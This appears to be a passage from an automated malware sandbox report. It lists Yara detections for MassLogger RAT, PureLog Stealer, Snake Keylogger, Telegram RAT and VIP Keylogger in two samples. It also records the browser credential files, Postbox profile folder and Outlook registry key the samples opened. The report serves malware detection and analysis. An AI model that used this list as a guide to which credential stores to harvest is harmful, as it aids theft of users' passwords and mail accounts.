Source: Yara match	File source: 16.3.Native_New-Nova.exe.59f268.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.Native_New-Nova.exe.3450190.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.Native_New-Nova.exe.50b0000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.Native_New-Nova.exe.3450190.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.Native_New-Nova.exe.3426478.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.Native_New-Nova.exe.22a183e.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.3.Native_New-Nova.exe.5993e8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.Native_New-Nova.exe.3600190.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.Native_New-Nova.exe.23e0f08.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.Native_New-Nova.exe.23e0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.Native_New-Nova.exe.50b0000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.Native_New-Nova.exe.2142746.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000010.00000002.2951469963.0000000002101000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2953521524.0000000002261000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2963089780.00000000035D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2954150757.00000000023E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2964034510.0000000004A80000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000003.1775462812.000000000059F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.1730790993.0000000000599000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2962477768.0000000003421000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2965310039.00000000050B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2964658526.0000000004B10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Native_New-Nova.exe PID: 7380, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Native_New-Nova.exe PID: 7800, type: MEMORYSTR

Yara detected MassLogger RAT

Source: Yara match	File source: 16.2.Native_New-Nova.exe.214183e.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.Native_New-Nova.exe.4a80000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.Native_New-Nova.exe.4a80f08.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.Native_New-Nova.exe.23e0000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.Native_New-Nova.exe.3425570.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.3.Native_New-Nova.exe.5993e8.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.Native_New-Nova.exe.2142746.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.Native_New-Nova.exe.4a80f08.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.Native_New-Nova.exe.4a80000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.Native_New-Nova.exe.22a2746.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.Native_New-Nova.exe.214183e.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.Native_New-Nova.exe.3600190.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.Native_New-Nova.exe.4b10000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.Native_New-Nova.exe.22a2746.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.Native_New-Nova.exe.35d5570.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.Native_New-Nova.exe.35d5570.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.Native_New-Nova.exe.3425570.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.3.Native_New-Nova.exe.59f268.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.Native_New-Nova.exe.4b10000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.Native_New-Nova.exe.22a183e.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.Native_New-Nova.exe.23e0f08.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.Native_New-Nova.exe.35d6478.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.Native_New-Nova.exe.3450190.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.Native_New-Nova.exe.3426478.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.Native_New-Nova.exe.35d6478.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.3.Native_New-Nova.exe.59f268.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.Native_New-Nova.exe.23e0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.Native_New-Nova.exe.50b0000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.Native_New-Nova.exe.3450190.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.Native_New-Nova.exe.3426478.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.Native_New-Nova.exe.22a183e.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.3.Native_New-Nova.exe.5993e8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.Native_New-Nova.exe.3600190.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.Native_New-Nova.exe.23e0f08.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.Native_New-Nova.exe.50b0000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.Native_New-Nova.exe.2142746.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000010.00000002.2951469963.0000000002101000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2953521524.0000000002261000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2963089780.00000000035D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2954150757.00000000023E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2964034510.0000000004A80000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000003.1775462812.000000000059F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.1730790993.0000000000599000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2962477768.0000000003421000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2965310039.00000000050B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2964658526.0000000004B10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Native_New-Nova.exe PID: 7380, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Native_New-Nova.exe PID: 7800, type: MEMORYSTR

Yara detected PureLog Stealer

Source: Yara match	File source: 16.2.Native_New-Nova.exe.214183e.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.Native_New-Nova.exe.4a80000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.Native_New-Nova.exe.4a80f08.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.Native_New-Nova.exe.23e0000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.Native_New-Nova.exe.3425570.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.3.Native_New-Nova.exe.5993e8.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.Native_New-Nova.exe.2142746.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.Native_New-Nova.exe.4a80f08.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.Native_New-Nova.exe.4a80000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.Native_New-Nova.exe.22a2746.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.Native_New-Nova.exe.214183e.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.Native_New-Nova.exe.3600190.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.Native_New-Nova.exe.4b10000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.Native_New-Nova.exe.35d5570.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.Native_New-Nova.exe.35d5570.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.Native_New-Nova.exe.3425570.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.3.Native_New-Nova.exe.59f268.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.Native_New-Nova.exe.4b10000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.Native_New-Nova.exe.22a183e.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.Native_New-Nova.exe.23e0f08.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.Native_New-Nova.exe.22a2746.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.Native_New-Nova.exe.35d6478.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.Native_New-Nova.exe.3426478.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.Native_New-Nova.exe.35d6478.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.3.Native_New-Nova.exe.59f268.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.Native_New-Nova.exe.50b0000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.Native_New-Nova.exe.3450190.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.Native_New-Nova.exe.3426478.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.Native_New-Nova.exe.22a183e.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.Native_New-Nova.exe.3450190.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.3.Native_New-Nova.exe.5993e8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.Native_New-Nova.exe.3600190.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.Native_New-Nova.exe.23e0f08.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.Native_New-Nova.exe.50b0000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.Native_New-Nova.exe.2142746.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.Native_New-Nova.exe.23e0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000010.00000002.2951469963.0000000002101000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2953521524.0000000002261000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2963089780.00000000035D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2954150757.00000000023E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2964034510.0000000004A80000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000003.1775462812.000000000059F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.1730790993.0000000000599000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2962477768.0000000003421000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2965310039.00000000050B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2964658526.0000000004B10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

Yara detected Snake Keylogger

Source: Yara match	File source: 0000000A.00000002.2956341043.0000000002451000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2957921883.0000000002581000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 16.2.Native_New-Nova.exe.214183e.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.Native_New-Nova.exe.4a80000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.Native_New-Nova.exe.4a80f08.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.Native_New-Nova.exe.23e0000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.Native_New-Nova.exe.3425570.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.3.Native_New-Nova.exe.5993e8.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.Native_snake01.exe.49d0000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.Native_New-Nova.exe.2142746.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.Native_New-Nova.exe.4a80f08.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.Native_New-Nova.exe.4a80000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.Native_New-Nova.exe.22a2746.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.Native_New-Nova.exe.214183e.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.Native_snake01.exe.2221216.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.Native_New-Nova.exe.3600190.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.Native_snake01.exe.4930f20.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.Native_New-Nova.exe.4b10000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.3.Native_snake01.exe.680768.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.Native_snake01.exe.4a10000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.Native_snake01.exe.4a10000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.Native_New-Nova.exe.22a2746.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.Native_New-Nova.exe.35d5570.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.Native_New-Nova.exe.35d5570.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.Native_snake01.exe.49c0f20.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.Native_New-Nova.exe.3425570.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.3.Native_New-Nova.exe.59f268.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.Native_New-Nova.exe.4b10000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.Native_snake01.exe.2221216.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.Native_New-Nova.exe.22a183e.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.Native_New-Nova.exe.23e0f08.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.Native_snake01.exe.49d0000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.Native_snake01.exe.49c0000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.Native_snake01.exe.49c0f20.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.Native_snake01.exe.4930000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.Native_New-Nova.exe.35d6478.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.Native_New-Nova.exe.3426478.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.Native_New-Nova.exe.35d6478.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.3.Native_New-Nova.exe.59f268.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.Native_snake01.exe.4930f20.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.Native_snake01.exe.22202f6.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.Native_snake01.exe.49c0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.Native_New-Nova.exe.50b0000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.Native_New-Nova.exe.3450190.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.Native_New-Nova.exe.3426478.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.Native_New-Nova.exe.22a183e.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.Native_New-Nova.exe.3450190.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.Native_snake01.exe.2141216.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.3.Native_New-Nova.exe.5993e8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.Native_New-Nova.exe.3600190.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.Native_snake01.exe.21402f6.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.Native_New-Nova.exe.23e0f08.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.Native_New-Nova.exe.23e0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.Native_New-Nova.exe.50b0000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.Native_snake01.exe.4930000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.Native_snake01.exe.2141216.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.Native_New-Nova.exe.2142746.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.Native_snake01.exe.21402f6.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.Native_snake01.exe.22202f6.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.3.Native_snake01.exe.680768.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000010.00000002.2951469963.0000000002101000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2953521524.0000000002261000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2963089780.00000000035D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2954940699.00000000021E0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2954150757.00000000023E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2969063278.00000000049C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000003.1776206771.0000000000680000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2964034510.0000000004A80000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2969436130.0000000004930000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000003.1775462812.000000000059F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.1732371805.0000000000768000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2970078800.00000000049D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.1730790993.0000000000599000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2953656770.0000000002100000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2962477768.0000000003421000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2965310039.00000000050B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2969184624.0000000004A10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2964658526.0000000004B10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Native_New-Nova.exe PID: 7380, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Native_snake01.exe PID: 7396, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Native_New-Nova.exe PID: 7800, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Native_snake01.exe PID: 7820, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match	File source: 10.2.Native_snake01.exe.49d0000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.Native_snake01.exe.2221216.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.Native_snake01.exe.4930f20.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.3.Native_snake01.exe.680768.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.Native_snake01.exe.4a10000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.Native_snake01.exe.4a10000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.Native_snake01.exe.49c0f20.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.Native_snake01.exe.2221216.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.Native_snake01.exe.49d0000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.Native_snake01.exe.49c0000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.Native_snake01.exe.49c0f20.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.Native_snake01.exe.4930000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.Native_snake01.exe.4930f20.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.Native_snake01.exe.22202f6.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.Native_snake01.exe.49c0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.Native_snake01.exe.2141216.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.Native_snake01.exe.21402f6.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.Native_snake01.exe.4930000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.Native_snake01.exe.2141216.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.Native_snake01.exe.21402f6.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.Native_snake01.exe.22202f6.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.3.Native_snake01.exe.680768.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000011.00000002.2954940699.00000000021E0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2969063278.00000000049C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000003.1776206771.0000000000680000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2969436130.0000000004930000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2956341043.000000000255B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.1732371805.0000000000768000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2970078800.00000000049D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2953656770.0000000002100000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2969184624.0000000004A10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2957921883.000000000271C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Native_snake01.exe PID: 7396, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Native_snake01.exe PID: 7820, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Source: Yara match	File source: 16.2.Native_New-Nova.exe.214183e.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.Native_New-Nova.exe.4a80000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.Native_New-Nova.exe.4a80f08.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.Native_New-Nova.exe.23e0000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.Native_New-Nova.exe.3425570.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.3.Native_New-Nova.exe.5993e8.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.Native_snake01.exe.49d0000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.Native_New-Nova.exe.2142746.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.Native_New-Nova.exe.4a80f08.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.Native_New-Nova.exe.4a80000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.Native_New-Nova.exe.22a2746.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.Native_New-Nova.exe.214183e.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.Native_snake01.exe.2221216.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.Native_New-Nova.exe.3600190.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.Native_snake01.exe.4930f20.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.Native_New-Nova.exe.4b10000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.3.Native_snake01.exe.680768.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.Native_snake01.exe.4a10000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.Native_snake01.exe.4a10000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.Native_New-Nova.exe.22a2746.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.Native_New-Nova.exe.35d5570.5.raw.unpack, type: UNPACKEDPE
